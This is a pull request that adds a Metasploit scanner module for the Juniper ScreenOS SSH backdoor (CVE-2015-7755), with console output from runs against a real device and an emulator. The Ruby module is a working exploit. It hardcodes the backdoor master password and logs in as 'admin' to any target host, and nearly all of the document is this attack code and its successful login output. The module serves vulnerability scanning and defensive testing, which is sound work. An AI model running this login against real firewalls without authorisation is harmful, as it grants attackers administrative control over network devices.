### PR TITLE
Cve-2015-7755 juniper backdoor

### DIFF
--- a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb
@@ -8,7 +8,6 @@ class MetasploitModule < Msf::Auxiliary
   require 'net/ssh'
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
- # include Msf::Auxiliary::CommandShell
 
   def initialize(info = {})
     super(update_info(info,

--- a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb
@@ -1,0 +1,80 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  require 'net/ssh'
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+ # include Msf::Auxiliary::CommandShell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Juniper SSH Backdoor Scanner',
+      'Description'    => %q{
+        This module scans for the Juniper SSH backdoor.  Also valid on telnet.
+        A username is required, and hte password is <<< %s(un='%s') = %u
+      },
+      'Author'         => [
+        'hdm',                                       # discovery
+        'h00die <mike@stcyrsecurity.com>'            # Module
+      ],
+      'References'     => [
+        ['CVE', '2015-7755'],
+        ['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor'],
+        ['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713&cat=SIRT_1&actp=LIST']
+      ],
+      'DisclosureDate' => 'Dec 20 2015',
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options([
+      Opt::RPORT(22)
+    ])
+
+    register_advanced_options([
+      OptBool.new('SSH_DEBUG',  [false, 'SSH debugging', false]),
+      OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])
+    ])
+  end
+
+  def run_host(ip)
+    ssh_opts = {
+      port:         rport,
+      auth_methods: ['password', 'keyboard-interactive'],
+      password:     '<<< %s(un=\'%s\') = %u'
+    }
+
+    ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
+
+    begin
+      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        Net::SSH.start(
+          ip,
+          'admin',
+          ssh_opts
+        )
+      end
+    rescue Net::SSH::Exception => e
+      vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")
+      return
+    end
+
+    if ssh
+      print_good("#{ip}:#{rport} - Logged in with backdoor account admin:<<< %s(un=\'%s\') = %u")
+      report_vuln(
+        :host => ip,
+        :name => self.name,
+        :refs => self.references,
+        :info => ssh.transport.server_version.version
+      )
+    end
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+end


### PR DESCRIPTION
Solves #6626 Juniper Backdoor Account Scanner
## Verification

I purchased an SSG5 to do my module against.  Output against that device is here:

```
msf > use auxiliary/scanner/ssh/juniper_backdoor
msf auxiliary(juniper_backdoor) > set rhosts 192.168.1.1
rhosts => 192.168.1.1
msf auxiliary(juniper_backdoor) > set verbose true
verbose => true
msf auxiliary(juniper_backdoor) > run

[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

However, since most people don't have a Juniper around to test with, 
I've also created an emulator that it also works against, 
which could be expanded to do further modules against (or i can add code to if ever needed).
https://github.com/h00die/MSF-Testing-Scripts and then the 2 juniper modules 
(this module only works against SSH).
Running against that:

```
msf > use auxiliary/scanner/ssh/juniper_backdoor
msf auxiliary(juniper_backdoor) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(juniper_backdoor) > set verbose true
verbose => true
msf auxiliary(juniper_backdoor) > run

[+] 127.0.0.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
